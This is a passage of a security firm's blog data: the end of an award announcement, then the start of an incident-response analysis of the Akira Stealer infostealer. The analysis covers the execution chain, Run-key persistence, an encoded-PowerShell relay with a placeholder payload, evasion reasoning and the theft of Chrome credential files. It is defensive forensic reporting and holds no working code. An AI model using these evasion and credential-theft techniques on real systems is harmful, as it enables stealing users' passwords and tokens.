scalability.\"",[41,8174,8176],{"id":8175},"glueckkanja-is-rising-star-managed-services-for-azure","glueckkanja is Rising Star Managed Services for Azure",[12,8178,31],{},[12,8180,8181],{},[2642,8182],{"alt":8183,"src":8184},"Managed Services for Azure","https://res.cloudinary.com/c4a8/image/upload/v1746721421/blog/pics/Managed_Services_for_Azure.png",[12,8186,8187],{},[3456,8188,8189],{},"\"glueckkanja is a Rising Star in Switzerland’s market for Azure Managed Services. With strong local presence, proven performance, and technological foresight, the company boosts security, automation, and scalability for future-ready cloud strategies.\"",[12,8191,8192],{},"With that, we say “Merci vielmals” – and raise a glass of Bärner Müntschi to celebrate. If you’d like to explore the full study in more detail, we’d be happy to send you the complete ISG overview of our strengths and capabilities.",{"title":65,"searchDepth":111,"depth":111,"links":8194},[8195,8196,8197],{"id":7996,"depth":111,"text":7997},{"id":8158,"depth":111,"text":8159},{"id":8175,"depth":111,"text":8176},{"lang":2171,"seoTitle":8199,"titleClass":2173,"date":8079,"categories":8200,"blogtitlepic":8201,"socialimg":8202,"customExcerpt":8203,"keywords":8204,"hreflang":8205,"footer":8210,"contactInContent":8211,"textImageTeaser":8237},"glueckkanja Switzerland named ISG ‘Rising Star’ 2025 for Microsoft 365 & Azure Services",[2962],"head-isg-ch-2025.png","/blog/heads/head-isg-ch-2025.png","glueckkanja Switzerland has been named a 'Rising Star' by ISG in the categories Microsoft 365 Services and Managed Services for Azure. A recognition that shows: our standards, our ambition, and our services are setting the benchmark – even across borders.","Microsoft Partner Switzerland, Managed Services Azure Switzerland, Microsoft 365 Services Switzerland, IT Provider Switzerland, Cloud Services Switzerland, ISG Provider Lens Switzerland, glueckkanja Switzerland, Microsoft Cloud Switzerland, Rising Star ISG 2025, IT Security Switzerland, Digital Transformation Switzerland, Azure Services Bern, Microsoft 365 Consulting Switzerland, glueckkanja, glueckkanja Bern, glueckkanja Microsoft Services",[8206,8208],{"lang":2260,"href":8207},"/blog/corporate/2025/05/isg-switzerland-2025",{"lang":2263,"href":8209},"/blog/corporate/2025/05/isg-switzerland-2025-es",{"noMargin":2181},{"quote":2181,"infos":8212},{"bgColor":2201,"headline":8093,"subline":8213,"level":41,"textStyling":2204,"flush":2205,"person":8214,"form":8221},"Want to dive deeper into the study results? Just reach out – we’ll send you the full ISG overview, including our skills and strengths.",{"image":8096,"cloudinary":2181,"alt":2415,"name":2415,"quotee":2415,"quoteeTitle":8097,"quote":8215,"detailsHeader":8099,"details":8216},"Being named a Rising Star proves that our approach is also resonating in Switzerland: standardized, secure Microsoft services – pragmatically implemented and offering real value to our customers.",[8217,8220],{"text":8218,"href":8219,"details":5274,"icon":5275},"+41 31 5611900","tel:+41 31 5611900",{"text":5266,"href":6190,"icon":5279},{"ctaText":2213,"cta":8222,"method":2169,"action":2216,"fields":8223},{"skin":2215},[8224,8225,8226,8227,8228,8230,8231,8233,8235,8236],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":2227,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},{"label":8110,"type":2232,"id":2233,"required":2168,"requiredMsg":2234},{"label":8229,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},"Your data will be stored and used to respond to your request. For more details, please see our \u003Ca href=\"/en/privacy\">Privacy Policy\u003C/a>.",{"type":2241,"id":2242,"value":2962},{"type":2241,"id":2244,"value":8232},"CH",{"type":2241,"id":2247,"value":8234},"Form: Blog ISG Switzerland | EN",{"type":2241,"id":2250,"value":2251},{"type":2241,"id":2253},{"image":8238,"cloudinary":2181,"alt":8122,"bgColor":8123,"offset":2168,"list":8239,"left":2168,"float":2168,"firstColWidth":650,"secondColWidth":662,"copyClasses":8128,"headline":8242,"subline":8243,"spacing":8131},"/logos/isg-provider-lens-leader-de.png",[8240],{"ctaText":8126,"ctaHref":8241,"ctaType":6003},"/en/blog/corporate/2025/05/isg-germany-2025","\u003Cp>By the way, in Germany we're a Leader in Microsoft 365 and Managed Azure!\u003Cbr />Thanks, ISG!\u003C/p>","\u003Cp>Check out our full ISG results in Germany.\u003C/p>","/posts/2025-05-08-isg-switzerland-2025",{"title":8139,"description":8145},"posts/2025-05-08-isg-switzerland-2025",[2972,4401],"GQbxxPIUgdk89qbTPcZ13Q1SucN9VT_3r1jQZCxkNek",{"id":8250,"title":8251,"author":8252,"body":8253,"cta":2166,"description":31,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":20592,"moment":20594,"navigation":2181,"path":20671,"seo":20672,"stem":20673,"tags":20674,"webcast":2168,"__hash__":20677},"content_en/posts/2025-06-16-quiet-breach.md","Inside Akira Stealer: A full technical analysis of a modular stealer",[7],{"type":9,"value":8254,"toc":20447},[8255,8259,8261,8268,8271,8288,8291,8308,8314,8317,8320,8341,8349,8360,8367,8370,8373,8388,8395,8398,8401,8412,8416,8418,8424,8428,8430,8433,8445,8454,8460,8463,8469,8472,8476,8478,8483,8489,8492,8496,8498,8501,8527,8532,8537,8541,8543,8546,8550,8552,8555,8557,8563,8566,8570,8572,8582,8585,8588,8608,8611,8618,8625,8627,8633,8636,8642,8645,8679,8682,8691,8697,8706,8709,8720,8723,8730,8732,8741,8751,8783,8789,8794,8815,8821,8824,8827,8833,8841,8848,8850,8853,8865,8868,8901,8907,8934,8943,8946,8951,8960,8962,8971,8977,8994,8997,9002,9036,9040,9043,9046,9052,9066,9072,9078,9080,9085,9089,9091,9162,9165,9169,9171,9176,9182,9187,9196,9201,9206,9217,9220,9225,9234,9240,9243,9247,9249,9260,9265,9284,9290,9299,9310,9317,9322,9326,9328,9334,9360,9363,9374,9377,9386,9389,9393,9395,9403,9406,9409,9422,9432,9439,9460,9463,9469,9473,9475,9478,9487,9499,9524,9530,9536,9539,9546,9549,9562,9569,9571,9578,9582,9584,9590,9688,9695,9702,9704,9707,9729,9732,9759,9762,9804,9807,9816,9819,9836,9842,9845,9854,9857,9871,9878,9882,9884,9891,9914,9921,9955,9958,9973,9980,9985,9996,9999,10003,10005,10008,10023,10030,10041,10052,10087,10094,10097,10101,10103,10109,10114,10154,10157,10172,10175,10184,10190,10193,10197,10199,10202,10211,10214,10261,10268,10272,10274,10279,10284,10313,10320,10322,10338,10342,10344,10347,10386,10392,10398,10402,10404,10423,10433,10440,10472,10479,10525,10533,10537,10539,10542,10570,10580,10587,10589,10594,10598,10600,10606,10610,10612,10619,10645,10652,10907,10910,10915,10918,10950,10955,10959,10961,10964,10968,10970,10973,11075,11078,11082,11084,11087,11249,11252,11275,11279,11281,11290,11530,11533,11562,11566,11568,11601,11604,11607,11638,11642,11644,11650,11655,11658,11675,11678,11686,11691,11694,11773,11781,11784,11790,11798,11802,11804,11810,11815,11818,11835,11842,11847,11854,11916,11929,11934,11940,11967,11970,12008,12011,12016,12019,12033,12037,12039,12044,12064,12071,12077,12079,12083,12085,12091,12095,12097,12101,12103,12108,12135,12141,12145,12147,12153,12170,12196,12203,12207,12209,12212,12221,12235,12238,12242,12244,12257,12260,12269,12274,12281,12283,12287,12289,12298,12302,12304,12309,12323,12338,12342,12344,12424,12427,12434,12436,12441,12499,12506,12632,12635,12780,12784,12786,12789,12843,12846,12850,12852,12859,12912,12915,12919,12921,12924,12976,12979,12983,12985,12992,13044,13047,13051,13053,13060,13101,13104,13108,13110,13117,13199,13202,13206,13208,13211,13258,13261,13265,13268,13271,13275,13277,13282,13288,13293,13299,13304,13310,13315,13321,13326,13727,13731,13733,13774,13778,13780,13788,13792,13794,13804,13809,13834,13855,13860,13947,13951,13953,14046,14049,14055,14062,14064,14067,14122,14177,14184,14186,14189,14224,14259,14266,14268,14271,14304,14339,14346,14348,14351,14420,14466,14473,14475,14478,14506,14536,14543,14545,14548,14576,14599,14609,14611,14614,14639,14677,14681,14683,14716,14720,14722,14725,14728,14731,14734,14737,14742,14767,14772,14802,14808,14817,14839,15048,15052,15054,15061,15159,15162,15166,15168,15175,15268,15278,15284,15287,15292,15298,15326,15331,15361,15414,15433,15436,15441,15490,15494,15496,15499,15503,15505,15511,15631,15650,15654,15656,15661,15735,15756,15760,15762,15765,15768,15771,15774,15873,15881,15885,15887,15892,15927,15948,15952,15954,15957,15960,15968,15971,16059,16073,16077,16079,16082,16085,16178,16184,16186,16192,16196,16198,16201,16266,16283,16286,16320,16323,16327,16329,16334,16347,16392,16418,16423,16435,16511,16566,16570,16572,16575,16581,16621,16631,16637,16647,16651,16653,16656,16685,16711,16717,16721,16723,16730,16737,16739,16745,16800,16828,16832,16834,16837,16902,16909,16948,16952,16954,16960,16975,16978,17013,17017,17019,17026,17070,17084,17090,17097,17099,17102,17106,17108,17111,17145,17148,17173,17177,17179,17184,17187,17211,17235,17239,17241,17244,17268,17272,17274,17277,17297,17301,17303,17306,17313,17426,17431,17476,17480,17482,17488,17522,17576,17581,17584,17588,17590,17593,17597,17599,17602,17608,17612,17614,17617,17672,17687,17691,17693,17704,17773,17782,17787,17790,17834,17836,17840,17842,17845,17935,17940,18069,18073,18075,18078,18083,18156,18174,18179,18199,18207,18212,18218,18233,18250,18256,18314,18332,18337,18354,18359,18403,18417,18420,18424,18426,18431,18435,18437,18444,18451,18455,18457,18568,18575,18579,18581,18587,18592,18672,18679,18686,18690,18692,18695,18724,18731,18735,18737,18741,18743,18750,18753,18756,18759,18902,18905,18909,18911,18914,18918,18920,18923,18958,18964,18968,18970,18973,18999,19002,19008,19012,19014,19019,19036,19042,19046,19048,19052,19054,19070,19094,19101,19117,19136,19139,19143,19145,19156,19160,19162,19596,19599,19603,19605,19611,19614,19617,19623,19626,19637,19643,19646,19651,19655,19657,19660,19665,19679,19683,19685,19982,19985,19989,19991,20103,20106,20110,20112,20166,20169,20173,20175,20338,20341,20345,20347,20388,20391,20395,20397,20400,20403,20406,20409,20412,20415,20420,20424,20426,20429,20432,20435,20438,20441,20444],[25,8256,8258],{"id":8257},"prologue","Prologue",[12,8260,31],{},[12,8262,8263,8264,8267],{},"It started like so many modern attacks do: quietly. A low-confidence Defender alert — ",[251,8265,8266],{},"\"Suspicious sequence of exploration activities\""," — surfaced during onboarding phase of a new customer into our glueckkanja Cyber Security Operations Center (CSOC).",[12,8269,8270],{},"There were no signature hits. No malware classifications. No real-time protection response. Just a single behavioral correlation in Microsoft 365 Defender, buried in the noise — and yet, unmistakably wrong.",[12,8272,8273,8274,8277,8278,2901,8281,8284,8285],{},"While triaging the alert, one specific action caught my attention: ",[63,8275,8276],{},"python.exe"," had accessed both the ",[63,8279,8280],{},"Login Data",[63,8282,8283],{},"Web Data"," files inside a Chromium profile. Microsoft Defender immediately escalated this to a high-severity incident — ",[251,8286,8287],{},"\"Possible theft of passwords and other sensitive web browser information.\"",[12,8289,8290],{},"This wasn’t a false positive. It was the tip of something deeper.",[12,8292,8293,8294,8297,8298,8301,8302,8305,8306,1013],{},"Tracing the telemetry backwards, I uncovered a generic startup-located binary — ",[63,8295,8296],{},"Updater.exe"," — which spawned a NodeJS-based wrapper (",[63,8299,8300],{},"main.exe",") that executed a command line to run a script named ",[63,8303,8304],{},"astor.py"," via ",[63,8307,8276],{},[56,8309,8312],{"className":8310,"code":8311,"language":61,"meta":65},[59],"Updater.exe → main.exe → cmd.exe → python.exe Crypto\\Util\\astor.py\n",[63,8313,8311],{"__ignoreMap":65},[12,8315,8316],{},"The script didn’t just scrape credentials — it executed a sequence of post-compromise reconnaissance steps, including registry queries, system fingerprinting, and privilege-aware enumeration. It operated with surgical precision, mimicking native system behavior to evade detection. And it worked — almost.",[12,8318,8319],{},"At the time of first response:",[1254,8321,8322,8331,8338],{},[1257,8323,8324,8326,8327,8330],{},[63,8325,8296],{}," was flagged by only ",[251,8328,8329],{},"1 out of 69"," engines on VirusTotal.",[1257,8332,8333,805,8335,8337],{},[63,8334,8300],{},[63,8336,8304],{},", and all associated components were not really flagged on VirusTotal.",[1257,8339,8340],{},"No files were signed. No elevated context. Just \"ordinary\" processes doing very non-ordinary things.",[12,8342,8343,8345,8346,8348],{},[63,8344,8296],{}," didn’t touch credentials. That task was reserved for ",[63,8347,8304],{},", the in-memory Python payload — a file that, by design, left almost no trace.",[12,8350,8351,8352,8355,8356,8359],{},"Within ",[251,8353,8354],{},"21 minutes",", the affected system was isolated from the network. Within ",[251,8357,8358],{},"70 minutes",", credentials were rotated across all affected scopes: internal identities, SaaS platforms, third-party services.",[12,8361,8362,8363,8366],{},"But the real turning point came when we extracted and fully decrypted the Python payload. What we found was not a generic stealer — it was a custom deployment of ",[251,8364,8365],{},"Akira Stealer v2",", a commercially distributed malware family sold via Telegram.",[12,8368,8369],{},"Thanks to our in-house threat intelligence and reverse engineering capabilities, we were able to reconstruct the full functionality of the malware, extract all embedded indicators, and understand its staging, exfiltration, and credential targeting logic in detail.",[12,8371,8372],{},"More importantly — we didn’t stop at technical attribution. We went further.",[12,8374,8375,8376,8379,8380,8383,8384,8387],{},"We were able to provide the client with a ",[251,8377,8378],{},"complete dataset of exfiltrated credentials",": over ",[251,8381,8382],{},"100 unique username-password combinations",", including access credentials to cloud services, CRM systems, internal platforms, and even personal tools used by key employees. The theft had been ongoing for ",[251,8385,8386],{},"months"," — and we could account for all of it.",[12,8389,8390,8391,8394],{},"Using insights gained from this case, we built a ",[251,8392,8393],{},"post-infection analysis tool"," that scans affected systems, reconstructs credential access patterns, and generates detailed forensic reports — mapping exactly what was stolen, when, and from where.",[12,8396,8397],{},"We’ll share a glimpse of that scanner at the end of this report.",[12,8399,8400],{},"Because this is more than just an incident.\nThis is how we investigate. This is how we protect.",[12,8402,8403,8409,8411],{},[251,8404,8405,8406,1013],{},"Welcome to the ",[2672,8407,8408],{"href":5241},"glueckkanja CSOC",[531,8410],{},"\nThis is how we work — because breaches don't wait.",[25,8413,8415],{"id":8414},"_1-initial-event-and-triage-summary","1. Initial Event and Triage Summary",[12,8417,31],{},[12,8419,8420,8421,8423],{},"On March 31, 2025, Microsoft Defender for Endpoint generated an alert labeled ",[251,8422,8266],{}," on a Windows 10 64-bit endpoint. I began the triage based on this signal and reviewed the affected system using the process tree, system timeline, and evidence correlated by Defender.",[41,8425,8427],{"id":8426},"_11-timeline-based-triage","1.1 Timeline-Based Triage",[12,8429,47],{},[12,8431,8432],{},"The alert pointed to a sequence of processes that warranted further inspection. During initial review, I observed the following access patterns to Chrome browser data within the local user profile:",[1254,8434,8435,8440],{},[1257,8436,8437],{},[63,8438,8439],{},"%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Login Data",[1257,8441,8442],{},[63,8443,8444],{},"%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Web Data",[12,8446,8447,8448,8450,8451,8453],{},"These accesses were initiated by a process named ",[63,8449,8296],{},". While Microsoft Defender had not flagged the binary based on heuristic or behavioral analysis, I found a detection for ",[63,8452,8296],{}," on VirusTotal — flagged by a single engine at that point in time.",[12,8455,8456],{},[2642,8457],{"alt":8458,"src":8459},"Microsoft Defender","https://res.cloudinary.com/c4a8/image/upload/v1749797184/blog/pics/microsoft-defender.png",[12,8461,8462],{},"The full observed execution chain was as follows:",[56,8464,8467],{"className":8465,"code":8466,"language":61,"meta":65},[59],"winlogon.exe\n└── userinit.exe\n    └── explorer.exe\n        └── Updater.exe\n            └── main.exe\n                └── cmd.exe /d /s /c \"python.exe Crypto\\Util\\astor.py\"\n                    └── python.exe Crypto\\Util\\astor.py\n",[63,8468,8466],{"__ignoreMap":65},[12,8470,8471],{},"At this stage, no deeper static or dynamic analysis of the involved files had been performed. My focus was on understanding the high-level behavior and context. The process names and file paths were generic, and no suspicious command-line arguments were present beyond the chained Python execution.",[41,8473,8475],{"id":8474},"_12-initial-response","1.2 Initial Response",[12,8477,47],{},[12,8479,8351,8480,8482],{},[251,8481,8354],{}," of the initial alert, I initiated host isolation using Defender for Endpoint’s isolation features. The goal was to prevent potential further spread or exfiltration.",[12,8484,8485,8486,8488],{},"Within the first ",[251,8487,8358],{},", we proceeded to rotate credentials that were known to be used on the affected host — covering internal systems, SaaS platforms, and critical third-party vendors.",[12,8490,8491],{},"The reverse engineering process began after the first containment. The following sections document the technical deep dive that followed to investigate the breach.",[41,8493,8495],{"id":8494},"_13-response-summary-fast-transparent-impact-driven","1.3 Response Summary – Fast, Transparent, Impact-Driven",[12,8497,47],{},[12,8499,8500],{},"Our response combined speed, expertise, and operational excellence—backed by proven workflows and full visibility for the customer.",[1254,8502,8503,8509,8515,8521],{},[1257,8504,8505,8508],{},[251,8506,8507],{},"Detection to full containment in under 90 minutes","\nDefender alerts, network isolation, antivirus scan, and credential revocation executed rapidly and in concert.",[1257,8510,8511,8514],{},[251,8512,8513],{},"Deep-dive forensic response within 48 hours","\nIncluding full disk and memory analysis, browser artifact review, credential dumping detection, and behavioral reconstruction of attacker activity.",[1257,8516,8517,8520],{},[251,8518,8519],{},"Secure data recovery & evidence handling","\nThe stolen data—including cookies, passwords, tokens, and browser profiles—was recovered, forensically archived, and handed off securely to the customer.",[1257,8522,8523,8526],{},[251,8524,8525],{},"End-to-end visibility and communication","\nEvery step—from first alert to remediation and debrief—was fully documented, shared in real time, and summarized in a structured CSIRT handover.",[2110,8528,8529],{},[12,8530,8531],{},"This incident showcases how glueckkanja CSOC doesn’t just stop malware—we dismantle its effects, restore control to our customers, and turn every incident into insight.",[52,8533],{"className":8534},[8535,8536],"space-top-1","space-bottom-1",[25,8538,8540],{"id":8539},"_2-malware-architecture-and-execution-chain-overview","2. Malware Architecture and Execution Chain Overview",[12,8542,31],{},[12,8544,8545],{},"The malware observed on the affected endpoint followed a structured, multi-stage architecture with clear separation of responsibilities: deployment, decoding, execution, and data exfiltration.",[41,8547,8549],{"id":8548},"_21-execution-chain-overview","2.1 Execution Chain Overview",[12,8551,47],{},[12,8553,8554],{},"The observed execution flow was as follows:",[12,8556,8296],{},[56,8558,8561],{"className":8559,"code":8560,"language":61},[59],"​   └── main.exe\n​       └── cmd.exe\n​           └── python.exe astor.py\n",[63,8562,8560],{"__ignoreMap":65},[12,8564,8565],{},"Each component in the chain contributed to stealth, modularity, and evasion. The architecture leveraged legitimate runtimes and standard OS interpreters to bypass detection mechanisms.",[186,8567,8569],{"id":8568},"_211-origin-uncertainty-missing-initial-vector","2.1.1 Origin Uncertainty: Missing Initial Vector",[12,8571,192],{},[12,8573,8574,8575,8578,8579,1013],{},"Despite extensive analysis of the post-compromise environment, the initial access vector could not be conclusively determined. This uncertainty stems primarily from the fact that the malware had remained active for an estimated ",[251,8576,8577],{},"six months prior to detection"," — exceeding the ",[251,8580,8581],{},"log retention period enforced by Microsoft Defender for Endpoint",[12,8583,8584],{},"As a result, no telemetry or forensic artifacts were available from the original time of infection. No initial process creation events, file drops, or command-line entries related to the delivery stage were recoverable from Defender’s timeline or associated sensors.",[12,8586,8587],{},"Based on contextual indicators and OSINT sources, a likely infection vector may have involved:",[1254,8589,8590,8596,8602],{},[1257,8591,8592,8595],{},[251,8593,8594],{},"Trojanized installers"," of cracked or modded gaming software",[1257,8597,8598,8601],{},[251,8599,8600],{},"Fake utilities"," or \"performance boosters\" distributed via forums and third-party sites",[1257,8603,8604,8607],{},[251,8605,8606],{},"Malicious browser extensions"," targeting specific user interests (e.g., crypto-related tools or Discord enhancements)",[12,8609,8610],{},"However, these remain speculative.",[12,8612,8613,8614,8617],{},"No confirmed dropper, phishing email, or compromised website could be identified during the investigation. While the malware architecture and execution chain were fully reconstructed, the ",[251,8615,8616],{},"initial point of compromise (MITRE ATT&CK T1190 / T1566)"," could not be validated.",[186,8619,8621,8622,8624],{"id":8620},"_212-updaterexe-initial-loader","2.1.2 ",[63,8623,8296],{}," – Initial Loader",[12,8626,192],{},[12,8628,8629,8630,8632],{},"When reviewing the process tree in Microsoft 365 Defender, ",[63,8631,8296],{}," stood out immediately — not because of what it did, but because of how silently it embedded itself into the system’s execution flow.",[12,8634,8635],{},"This binary was registered for automatic execution via the standard Windows Run key:",[56,8637,8640],{"className":8638,"code":8639,"language":61},[59],"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n",[63,8641,8639],{"__ignoreMap":65},[12,8643,8644],{},"That meant it would launch every time the user logged into their session — a classic persistence mechanism that requires no elevated privileges and often slips through unnoticed in EDR telemetry.",[1254,8646,8647,8653,8659,8665,8671],{},[1257,8648,8649,8652],{},[251,8650,8651],{},"File Type",": Windows PE executable (32-bit)",[1257,8654,8655,8658],{},[251,8656,8657],{},"Signature",": Unsigned",[1257,8660,8661,8664],{},[251,8662,8663],{},"VirusTotal Detection",": 1 out of 69 engines at the time of triage",[1257,8666,8667,8670],{},[251,8668,8669],{},"Execution Context",": Medium integrity, user session",[1257,8672,8673,1061,8676],{},[251,8674,8675],{},"Location",[63,8677,8678],{},"AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\",[12,8680,8681],{},"The file itself was small, cleanly compiled, and unremarkable from a static analysis standpoint. No suspicious strings, no encrypted sections, and no indicators of obfuscation or packing. It imported only a minimal set of standard Windows API functions and contained no embedded payload.",[12,8683,8684,8685,8687,8688,8690],{},"However, its behavior was more telling. Once launched, ",[63,8686,8296],{}," extracted an Electron application from a bundled archive — a self-contained NodeJS runtime packaged using standard Electron tooling. This unpacked folder contained an executable named ",[63,8689,8300],{},", which was subsequently launched as a child process.",[56,8692,8695],{"className":8693,"code":8694,"language":61,"meta":65},[59],"Updater.exe → main.exe\n",[63,8696,8694],{"__ignoreMap":65},[12,8698,8699,8700,8702,8703,8705],{},"There were no network indicators at this stage, no process injection, and no anomaly in privileges or token elevation. The entire role of ",[63,8701,8296],{}," appeared to be that of a loader — delivering a second-stage component (",[63,8704,8300],{},") into the environment, likely with the goal of maintaining stealth and modularity.",[12,8707,8708],{},"This kind of architectural separation is common in modern commodity malware and stealer toolkits. The initial loader acts merely as a deployment stub, allowing the heavier logic — often obfuscated, interpreted, or dynamically generated — to be contained in later stages.",[12,8710,8711,8712,8714,8715,8717,8718,1013],{},"In this case, ",[63,8713,8296],{}," served precisely that purpose: a quiet initial foothold designed to blend in, remain undetected, and pave the way for the execution of the actual stealer logic in ",[63,8716,8300],{}," and eventually ",[63,8719,8304],{},[12,8721,8722],{},"It didn’t touch the file system beyond its own directory and didn’t trigger any behavioral rules — and yet, it was the first domino in a long and carefully constructed attack chain.",[186,8724,8726,8727,8729],{"id":8725},"_213-mainexe-obfuscated-nodejs-payload-container","2.1.3 ",[63,8728,8300],{}," – Obfuscated NodeJS Payload Container",[12,8731,192],{},[12,8733,8734,8735,8737,8738,8740],{},"Following the execution of ",[63,8736,8296],{},", a second-stage binary named ",[63,8739,8300],{}," was launched. This component presented itself as a standard Electron application — a runtime environment bundling Node.js and Chromium, often used for cross-platform desktop apps. Its innocuous nature is part of what makes it so dangerous in the wrong hands.",[12,8742,8743,8744,8746,8747,8750],{},"Upon inspection, ",[63,8745,8300],{}," contained an internal archive named ",[63,8748,8749],{},"app.asar"," — the standard packaging format for Electron-based applications. Unlike legitimate Electron apps, however, the contents of this archive were anything but ordinary.",[1254,8752,8753,8759,8765,8773],{},[1257,8754,8755,8758],{},[251,8756,8757],{},"Platform",": Electron (Node.js + Chromium)",[1257,8760,8761,8764],{},[251,8762,8763],{},"Architecture",": 64-bit Windows",[1257,8766,8767,8770,8771],{},[251,8768,8769],{},"Content Structure",": Embedded JavaScript files within ",[63,8772,8749],{},[1257,8774,8775,8778,8779,8782],{},[251,8776,8777],{},"Obfuscation Level",": High — achieved through ",[63,8780,8781],{},"js-confuser",", a commercially available obfuscation toolkit for JavaScript",[12,8784,8785,8786,8788],{},"Once decompiled and deobfuscated, the core logic of ",[63,8787,8300],{}," became evident. Its purpose was not to present a GUI or execute any frontend logic — instead, it acted as a hidden execution orchestrator.",[12,8790,8791],{},[251,8792,8793],{},"Observed Behavior:",[1254,8795,8796,8799,8806],{},[1257,8797,8798],{},"Decrypts and reconstructs a Base64-encoded PowerShell command stored within the JavaScript payload",[1257,8800,8801,8802,8805],{},"Spawns ",[63,8803,8804],{},"cmd.exe"," to execute the PowerShell command inline",[1257,8807,8808,8809,8811,8812,1288],{},"The PowerShell command in turn invokes ",[63,8810,8276],{},", passing in a script located under a seemingly benign directory structure (",[63,8813,8814],{},"Crypto\\Util\\astor.py",[56,8816,8819],{"className":8817,"code":8818,"language":61,"meta":65},[59],"main.exe → cmd.exe /d /s /c powershell → python.exe Crypto\\Util\\astor.py\n",[63,8820,8818],{"__ignoreMap":65},[12,8822,8823],{},"This chaining allowed the attacker to shift execution contexts and evade straightforward detection. Because the payload was obfuscated and staged in-memory, traditional signature-based controls were ineffective.",[12,8825,8826],{},"The Electron framework provided an ideal cover — allowing execution of arbitrary JavaScript while avoiding scrutiny. JavaScript-based execution also introduced cross-platform compatibility, allowing for flexible deployment and easier integration of dynamic control logic.",[12,8828,8829,8830,8832],{},"What made ",[63,8831,8300],{}," particularly dangerous was its ability to operate without dropping any additional files beyond what had already been staged. The stealer script was invoked directly from disk, but all staging and execution logic remained embedded within the Electron bundle.",[12,8834,8835,8836,8838,8839,1013],{},"In summary, ",[63,8837,8300],{}," served as the obfuscated, multi-layered execution core — acting as the gatekeeper between initial persistence and the full activation of the Akira Stealer payload in ",[63,8840,8304],{},[186,8842,8844,8845,8847],{"id":8843},"_214-cmdexe-powershell-relay","2.1.4 ",[63,8846,8804],{}," & PowerShell Relay",[12,8849,192],{},[12,8851,8852],{},"This stage of the execution chain functioned as a relay — not for payload logic, but for obfuscation and indirection.",[12,8854,8855,8856,8858,8859,8861,8862,1013],{},"After ",[63,8857,8300],{}," completed its role of unpacking and decoding the payload, it spawned a ",[63,8860,8804],{}," process. This process did not contain any malicious logic itself, nor did it write or modify files. Its sole purpose was to serve as a wrapper for launching a PowerShell session with an ",[251,8863,8864],{},"encoded command",[12,8866,8867],{},"This method is a well-known tactic used to reduce visibility and avoid detection:",[1254,8869,8870,8881],{},[1257,8871,8872,1550,8875],{},[251,8873,8874],{},"Execution Chain",[56,8876,8879],{"className":8877,"code":8878,"language":61},[59],"main.exe → cmd.exe /d /s /c \"powershell -EncodedCommand \u003CBase64Payload>\"\n",[63,8880,8878],{"__ignoreMap":65},[1257,8882,8883,1550,8886],{},[251,8884,8885],{},"Purpose",[1254,8887,8888,8891,8894],{},[1257,8889,8890],{},"Encapsulates PowerShell execution within an additional shell",[1257,8892,8893],{},"Hides the actual PowerShell code from direct visibility in logs",[1257,8895,8896,8897,8900],{},"Evades EDRs that trigger on direct ",[63,8898,8899],{},"powershell.exe"," usage with suspicious parameters",[12,8902,8903,8904,8906],{},"By embedding the PowerShell script as a Base64-encoded string and invoking it through ",[63,8905,8804],{},", the attacker avoided multiple forms of detection:",[1254,8908,8909,8914,8919],{},[1257,8910,8911],{},[251,8912,8913],{},"Command-line heuristic filters",[1257,8915,8916],{},[251,8917,8918],{},"Standard logging (e.g., Event ID 4104, 4688)",[1257,8920,8921],{},[251,8922,8923,8924,8926,8927,805,8930,8933],{},"Rule-based detections for ",[63,8925,8899],{}," arguments like ",[63,8928,8929],{},"-NoProfile",[63,8931,8932],{},"-ExecutionPolicy Bypass",", or inline scripts",[12,8935,8936,8937,8939,8940,8942],{},"Notably, the PowerShell command was kept minimal and solely focused on launching ",[63,8938,8276],{}," with a path to the embedded stealer script — ",[63,8941,8304],{},". No additional modules were loaded, and no obvious signatures were present in memory.",[12,8944,8945],{},"This relay technique is often used in red teaming and by sophisticated infostealers alike — serving as a lightweight evasion layer that’s easy to implement but hard to catch without telemetry correlation.",[12,8947,8711,8948,8950],{},[63,8949,8804],{}," served exactly that purpose: a simple, silent bridge between JavaScript logic and Python execution — one that almost slipped through unnoticed.",[186,8952,8954,8955,8957,8958],{"id":8953},"_215-pythonexe-with-astorpy","2.1.5 ",[63,8956,8276],{}," with ",[63,8959,8304],{},[12,8961,192],{},[12,8963,8964,8965,8967,8968,8970],{},"The final and most impactful stage of the execution chain was reached when ",[63,8966,8276],{}," invoked ",[63,8969,8304],{}," — a Python-based, modular infostealer operating entirely in memory. This script represented the operational core of the entire attack chain.",[12,8972,8973,8974,8976],{},"Unlike many commodity stealers, ",[63,8975,8304],{}," was not deployed in plaintext. It was protected by a multi-layered decryption mechanism:",[1254,8978,8979,8988],{},[1257,8980,8981,8984,8985,1013],{},[251,8982,8983],{},"Decryption Stack",": The file was first GZIP-compressed and then encrypted using ",[251,8986,8987],{},"AES-256-CBC",[1257,8989,8990,8993],{},[251,8991,8992],{},"Key Derivation",": A PBKDF2-based key derivation process was used (SHA-512, 1,000,000 iterations), making static analysis and brute-forcing highly impractical.",[12,8995,8996],{},"Once decrypted at runtime, the script executed several specialized modules, all targeting sensitive data sources:",[12,8998,8999],{},[251,9000,9001],{},"Core Capabilities",[1254,9003,9004,9010,9020,9030],{},[1257,9005,9006,9009],{},[251,9007,9008],{},"Browser Data Extraction",": Retrieved login credentials, cookies, and autofill data from Chromium-based browsers (Chrome, Edge, Brave, Opera)",[1257,9011,9012,9015,9016,9019],{},[251,9013,9014],{},"Token Harvesting",": Collected session tokens, particularly from ",[251,9017,9018],{},"Discord",", and scanned for cryptocurrency wallet extensions",[1257,9021,9022,9025,9026,9029],{},[251,9023,9024],{},"Data Packaging",": Aggregated all harvested data into a structured ",[251,9027,9028],{},"ZIP archive",", preserving directory and file context for attacker-side parsing",[1257,9031,9032,9035],{},[251,9033,9034],{},"Exfiltration",": Uploaded the resulting archive to public APIs and infrastructure.",[12,9037,9038],{},[251,9039,8669],{},[12,9041,9042],{},"The entire stealer logic executed from memory, with no persistent files written to disk. It left minimal telemetry traces beyond in-process memory artifacts and standard subprocess invocation. No attempt was made to establish persistence at this stage — the goal was quick, efficient, and silent data theft.",[12,9044,9045],{},"The use of legitimate APIs for exfiltration also made detection and prevention significantly harder, as outbound traffic blended in 